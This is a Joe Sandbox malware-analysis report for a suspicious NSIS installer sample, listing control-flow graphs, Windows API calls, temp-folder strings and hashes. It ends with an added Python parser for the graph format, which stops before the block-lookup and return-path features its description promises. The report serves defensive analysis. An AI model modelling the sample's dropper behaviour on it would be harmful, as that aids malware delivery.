266->271 267->266 272 404275-4042a3 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042a5-4042b6 SendMessageW 272->273 274 4042b8 272->274 275 4042be-4042fd call 404498 call 403f45 call 406507 lstrlenW call 406544 SetWindowTextW call 401389 273->275 274->275 275->218 286 404303-404305 275->286 286->218 287 40430b-40430f 286->287 288 404311-404317 287->288 289 40432e-404342 DestroyWindow 287->289 288->217 290 40431d-404323 288->290 289->221 291 404348-404375 CreateDialogParamW 289->291 290->218 292 404329 290->292 291->221 293 40437b-4043d2 call 404463 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->217 293->217 298 4043d4-4043e7 ShowWindow call 4044af 293->298 300 4043ec 298->300 300->221
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FA0
                                                                                                                                                                            • ShowWindow.USER32(?), ref: 00403FC0
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00403FD2
                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 00403FEB
                                                                                                                                                                            • DestroyWindow.USER32 ref: 00403FFF
                                                                                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404018
                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 00404037
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040404B
                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00404052
                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 004040FD
                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00404107
                                                                                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00404121
                                                                                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404172
                                                                                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00404218
                                                                                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00404239
                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040424B
                                                                                                                                                                            • EnableWindow.USER32(?,?), ref: 00404266
                                                                                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040427C
                                                                                                                                                                            • EnableMenuItem.USER32(00000000), ref: 00404283
                                                                                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040429B
                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042AE
                                                                                                                                                                            • lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004042D8
                                                                                                                                                                            • SetWindowTextW.USER32(?,00423708), ref: 004042EC
                                                                                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 00404420
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 121052019-0
                                                                                                                                                                            • Opcode ID: 66e8e1124669f3008a4bd8227f077bc543d240224f138d8a0267bdb9be33da1e
                                                                                                                                                                            • Instruction ID: 63d0405a778065079f0a8243b170f3468528db945c37da0c1c9e117f306831cd
                                                                                                                                                                            • Opcode Fuzzy Hash: 66e8e1124669f3008a4bd8227f077bc543d240224f138d8a0267bdb9be33da1e
                                                                                                                                                                            • Instruction Fuzzy Hash: 30C1D2B1600205EBDB306F61ED89E3A3A68EB94709F51053EF791B11F0CB795852DB2E

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 301 403bb6-403bce call 4068d4 304 403bd0-403be0 call 40644e 301->304 305 403be2-403c19 call 4063d5 301->305 314 403c3c-403c65 call 403e8c call 405ede 304->314 310 403c31-403c37 lstrcatW 305->310 311 403c1b-403c2c call 4063d5 305->311 310->314 311->310 319 403cf7-403cff call 405ede 314->319 320 403c6b-403c70 314->320 326 403d01-403d08 call 406544 319->326 327 403d0d-403d32 LoadImageW 319->327 320->319 321 403c76-403c9e call 4063d5 320->321 321->319 328 403ca0-403ca4 321->328 326->327 330 403db3-403dbb call 40140b 327->330 331 403d34-403d64 RegisterClassW 327->331 332 403cb6-403cc2 lstrlenW 328->332 333 403ca6-403cb3 call 405e03 328->333 344 403dc5-403dd0 call 403e8c 330->344 345 403dbd-403dc0 330->345 334 403e82 331->334 335 403d6a-403dae SystemParametersInfoW CreateWindowExW 331->335 339 403cc4-403cd2 lstrcmpiW 332->339 340 403cea-403cf2 call 405dd6 call 406507 332->340 333->332 338 403e84-403e8b 334->338 335->330 339->340 343 403cd4-403cde GetFileAttributesW 339->343 340->319 348 403ce0-403ce2 343->348 349 403ce4-403ce5 call 405e22 343->349 354 403dd6-403df0 ShowWindow call 406864 344->354 355 403e59-403e5a call 40563c 344->355 345->338 348->340 348->349 349->340 362 403df2-403df7 call 406864 354->362 363 403dfc-403e0e GetClassInfoW 354->363 359 403e5f-403e61 355->359 360 403e63-403e69 359->360 361 403e7b-403e7d call 40140b 359->361 360->345 364 403e6f-403e76 call 40140b 360->364 361->334 362->363 367 403e10-403e20 GetClassInfoW RegisterClassW 363->367 368 403e26-403e49 DialogBoxParamW call 40140b 363->368 364->345 367->368 372 403e4e-403e57 call 403b06 368->372 372->338
APIs
  • Part of subcall function 004068D4: GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
  • Part of subcall function 004068D4: GetProcAddress.KERNEL32(00000000,?), ref: 00406901
• lstrcatW.KERNEL32(1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403C37
• lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,75923420), ref: 00403CB7
• lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403CCA
• GetFileAttributesW.KERNEL32(: Completed,?,00000000,?), ref: 00403CD5
• LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner), ref: 00403D1E
  • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
• RegisterClassW.USER32(004291C0), ref: 00403D5B
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403D73
• CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DA8
• ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DDE
• GetClassInfoW.USER32(00000000,RichEdit20W,004291C0), ref: 00403E0A
• GetClassInfoW.USER32(00000000,RichEdit,004291C0), ref: 00403E17
• RegisterClassW.USER32(004291C0), ref: 00403E20
• DialogBoxParamW.USER32(?,00000000,00403F64,00000000), ref: 00403E3F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
• String ID: .DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
• API String ID: 1975747703-2176109169
• Opcode ID: 6641f25268bcb411ff60996ee06ee97a96bb8d093e03f8a241686f6243dfe293
• Instruction ID: f8e28dda484975e23f2397f6e39507faffe4a9094113ace64084d81fe028ea3a
• Opcode Fuzzy Hash: 6641f25268bcb411ff60996ee06ee97a96bb8d093e03f8a241686f6243dfe293
• Instruction Fuzzy Hash: B761D570244200BBD720AF66AD45F2B3A6CEB84B49F40453FFD41B62E1DB795912CA7D

Control-flow Graph: function 40307d (graph image not rendered in this export)
APIs
• GetTickCount.KERNEL32 ref: 0040308E
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\fGu8xWoMrg.exe,00000400,?,?,?,?,?,00403847,?), ref: 004030AA
  • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\fGu8xWoMrg.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
  • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
• GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fGu8xWoMrg.exe,C:\Users\user\Desktop\fGu8xWoMrg.exe,80000000,00000003,?,?,?,?,?,00403847), ref: 004030F6
• GlobalAlloc.KERNELBASE(00000040,G8@,?,?,?,?,?,00403847,?), ref: 0040322C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
• String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\fGu8xWoMrg.exe$Error launching installer$G8@$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
• API String ID: 2803837635-1469880417
• Opcode ID: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
• Instruction ID: 1a01736021049f1647ec9a5272654600d533d4cd09788acd7f842f4bfc25432a
• Opcode Fuzzy Hash: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
• Instruction Fuzzy Hash: 06518371901205AFDB209F65DD82B9E7EACEB09756F10807BF901B62D1C77C8F418A6D

Control-flow Graph: function 406544 (graph image not rendered in this export)
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 0040665F
                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,004055A0,Completed,00000000,00000000,00418EC0,00000000), ref: 00406672
                                                                                                                                                                            • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                            • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                                                                                                            • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                            • API String ID: 4260037668-905382516
                                                                                                                                                                            • Opcode ID: 4f256cf52d51bc45a82507bfe95e0a7ec11cb3c5eab23a7c9971658e825af729
                                                                                                                                                                            • Instruction ID: a0e829acba6452fa9eccf544198c9fcc7de98ae724d9d0e98a153b46e40356ac
                                                                                                                                                                            • Opcode Fuzzy Hash: 4f256cf52d51bc45a82507bfe95e0a7ec11cb3c5eab23a7c9971658e825af729
                                                                                                                                                                            • Instruction Fuzzy Hash: 5261E371A00215ABDB209F64DC40AAE37A5EF44318F11813AE957B72D0D77E8AA1CB5D

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            control_flow_graph 564 40176f-401794 call 402da6 call 405e4d 569 401796-40179c call 406507 564->569 570 40179e-4017b0 call 406507 call 405dd6 lstrcatW 564->570 575 4017b5-4017b6 call 40678e 569->575 570->575 579 4017bb-4017bf 575->579 580 4017c1-4017cb call 40683d 579->580 581 4017f2-4017f5 579->581 588 4017dd-4017ef 580->588 589 4017cd-4017db CompareFileTime 580->589 582 4017f7-4017f8 call 405fd2 581->582 583 4017fd-401819 call 405ff7 581->583 582->583 591 40181b-40181e 583->591 592 40188d-4018b6 call 405569 call 4032b4 583->592 588->581 589->588 593 401820-40185e call 406507 * 2 call 406544 call 406507 call 405b67 591->593 594 40186f-401879 call 405569 591->594 604 4018b8-4018bc 592->604 605 4018be-4018ca SetFileTime 592->605 593->579 626 401864-401865 593->626 606 401882-401888 594->606 604->605 608 4018d0-4018db CloseHandle 604->608 605->608 609 402c33 606->609 611 4018e1-4018e4 608->611 612 402c2a-402c2d 608->612 613 402c35-402c39 609->613 616 4018e6-4018f7 call 406544 lstrcatW 611->616 617 4018f9-4018fc call 406544 611->617 612->609 623 401901-4023a2 call 405b67 616->623 617->623 623->612 623->613 626->606 628 401867-401868 626->628 628->594
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner,?,?,00000031), ref: 004017B0
                                                                                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner,?,?,00000031), ref: 004017D5
                                                                                                                                                                              • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
                                                                                                                                                                              • Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                                                                                                                                              • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                                                                                                                                              • Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED,004033ED,Completed,00000000,00418EC0,00000000), ref: 004055C4
                                                                                                                                                                              • Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
                                                                                                                                                                              • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                                                                                                                                              • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                                                                                                                                              • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner$C:\Users\user\AppData\Local\Temp\nsc9301.tmp\nsExec.dll$ExecToStack
                                                                                                                                                                            • API String ID: 1941528284-681225680
                                                                                                                                                                            • Opcode ID: cff18b76cdb8d76bbb3d49e6b079a2043f43baf22f2567b8a93e71465b720055
                                                                                                                                                                            • Instruction ID: a51aac5e68297d7f44276dbadf5c543e50a4c9306f3e74aef663979029aae524
                                                                                                                                                                            • Opcode Fuzzy Hash: cff18b76cdb8d76bbb3d49e6b079a2043f43baf22f2567b8a93e71465b720055
                                                                                                                                                                            • Instruction Fuzzy Hash: AA41A071900105BACF11BBA5DD85DAE3AB9EF45328F20423FF412B10E1D63C8A519A6E

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            control_flow_graph 630 405569-40557e 631 405584-405595 630->631 632 405635-405639 630->632 633 4055a0-4055ac lstrlenW 631->633 634 405597-40559b call 406544 631->634 636 4055c9-4055cd 633->636 637 4055ae-4055be lstrlenW 633->637 634->633 639 4055dc-4055e0 636->639 640 4055cf-4055d6 SetWindowTextW 636->640 637->632 638 4055c0-4055c4 lstrcatW 637->638 638->636 641 4055e2-405624 SendMessageW * 3 639->641 642 405626-405628 639->642 640->639 641->642 642->632 643 40562a-40562d 642->643 643->632
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                                                                                                                                            • lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                                                                                                                                            • lstrcatW.KERNEL32(Completed,004033ED,004033ED,Completed,00000000,00418EC0,00000000), ref: 004055C4
                                                                                                                                                                            • SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                                                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                                                                                                                                              • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                              • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                                                                                                            • String ID: Completed
                                                                                                                                                                            • API String ID: 1495540970-3087654605
                                                                                                                                                                            • Opcode ID: c9e82e23593916cc8667a553ec3376e3b2091dc3bfbd8f68e29cf771addae687
                                                                                                                                                                            • Instruction ID: ee6600945c56622aa7300660faa8e28c1de3552a97c3cc7a142cd67d2e53ceba
                                                                                                                                                                            • Opcode Fuzzy Hash: c9e82e23593916cc8667a553ec3376e3b2091dc3bfbd8f68e29cf771addae687
                                                                                                                                                                            • Instruction Fuzzy Hash: 7021AC71900518BACF219F96DD84ACFBFB9EF45354F50807AF904B62A0C7798A51CFA8
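
The control_flow_graph listings in this report are Joe Sandbox's edge-list rendering of each function's basic-block graph, which is hard to read as printed. The Python script below is an added example, not part of the Joe Sandbox report or its tooling: it parses that format (node syntax '<id> <start>[-<end>]' followed by imported API names, 'call <addr>' for intra-module calls and '* n' repetition counts; edge syntax '<src>-><dst>'), using the 0x405569 listing from this page as its embedded sample input, and answers the questions an analyst asks of such a graph: which APIs are reachable from the entry block and how many call sites each has (the counts can be checked against the function's own APIs list above), which basic block contains a given 'ref:' address, and which blocks are return paths. Treating the first node listed as the function entry and '* n' as 'n call sites in this block' are assumptions about the format inferred from this page, not documented behaviour.

```python
"""Parse a Joe Sandbox 'control_flow_graph' edge listing into a queryable graph.

Sample input (constructed by copying the 0x405569 listing from this report):
node syntax '<id> <start>[-<end>] [<api> | call <addr> | * <n>]...', edge syntax '<src>-><dst>'.
"""
import re
from collections import Counter, deque
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

SAMPLE = (
    "control_flow_graph 630 405569-40557e 631 405584-405595 630->631 632 405635-405639 "
    "630->632 633 4055a0-4055ac lstrlenW 631->633 634 405597-40559b call 406544 631->634 "
    "636 4055c9-4055cd 633->636 637 4055ae-4055be lstrlenW 633->637 634->633 "
    "639 4055dc-4055e0 636->639 640 4055cf-4055d6 SetWindowTextW 636->640 637->632 "
    "638 4055c0-4055c4 lstrcatW 637->638 638->636 641 4055e2-405624 SendMessageW * 3 "
    "639->641 642 405626-405628 639->642 640->639 641->642 642->632 "
    "643 40562a-40562d 642->643 643->632"
)

ADDR_RE = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$", re.I)


@dataclass
class Block:
    node_id: int
    start: int
    end: int
    apis: Counter = field(default_factory=Counter)   # Win32 API name -> call sites in block
    calls: List[int] = field(default_factory=list)   # intra-module call targets


@dataclass
class CFG:
    blocks: Dict[int, Block] = field(default_factory=dict)
    edges: List[Tuple[int, int]] = field(default_factory=list)
    entry: Optional[int] = None   # assumption: the first node listed is the function entry


def parse_cfg(line: str) -> CFG:
    tokens = line.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    g = CFG()
    cur: Optional[Block] = None
    last: Optional[Tuple[str, object]] = None   # item a following '* n' multiplies
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:                                  # edge between two node ids
            src, dst = tok.split("->", 1)
            g.edges.append((int(src), int(dst)))
            i += 1
        elif tok == "call":                              # 'call <hexaddr>': intra-module call
            if cur is None:
                raise ValueError("'call' before any node definition")
            target = int(tokens[i + 1], 16)
            cur.calls.append(target)
            last = ("call", target)
            i += 2
        elif tok == "*":                                 # '* n': previous item occurs n times (assumption)
            n = int(tokens[i + 1])
            if last is not None and last[0] == "api":
                cur.apis[last[1]] += n - 1
            elif last is not None and last[0] == "call":
                cur.calls.extend([last[1]] * (n - 1))
            i += 2
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            lo, _, hi = tokens[i + 1].partition("-")     # single-address nodes have no '-end'
            cur = Block(int(tok), int(lo, 16), int(hi or lo, 16))
            g.blocks[cur.node_id] = cur
            if g.entry is None:
                g.entry = cur.node_id
            last = None
            i += 2
        else:                                            # anything else is an imported API name
            if cur is None:
                raise ValueError(f"label {tok!r} before any node definition")
            cur.apis[tok] += 1
            last = ("api", tok)
            i += 1
    return g


def successors(g: CFG) -> Dict[int, List[int]]:
    adj: Dict[int, List[int]] = {n: [] for n in g.blocks}
    for s, d in g.edges:
        adj.setdefault(s, []).append(d)
    return adj


def reachable(g: CFG, start: Optional[int] = None) -> Set[int]:
    """Node ids reachable over CFG edges from `start` (default: the entry block)."""
    adj = successors(g)
    root = g.entry if start is None else start
    seen, todo = {root}, deque([root])
    while todo:
        for m in adj.get(todo.popleft(), []):
            if m not in seen:
                seen.add(m)
                todo.append(m)
    return seen


def api_call_counts(g: CFG) -> Counter:
    """API call sites summed over all blocks; comparable with the report's per-function APIs list."""
    total: Counter = Counter()
    for b in g.blocks.values():
        total.update(b.apis)
    return total


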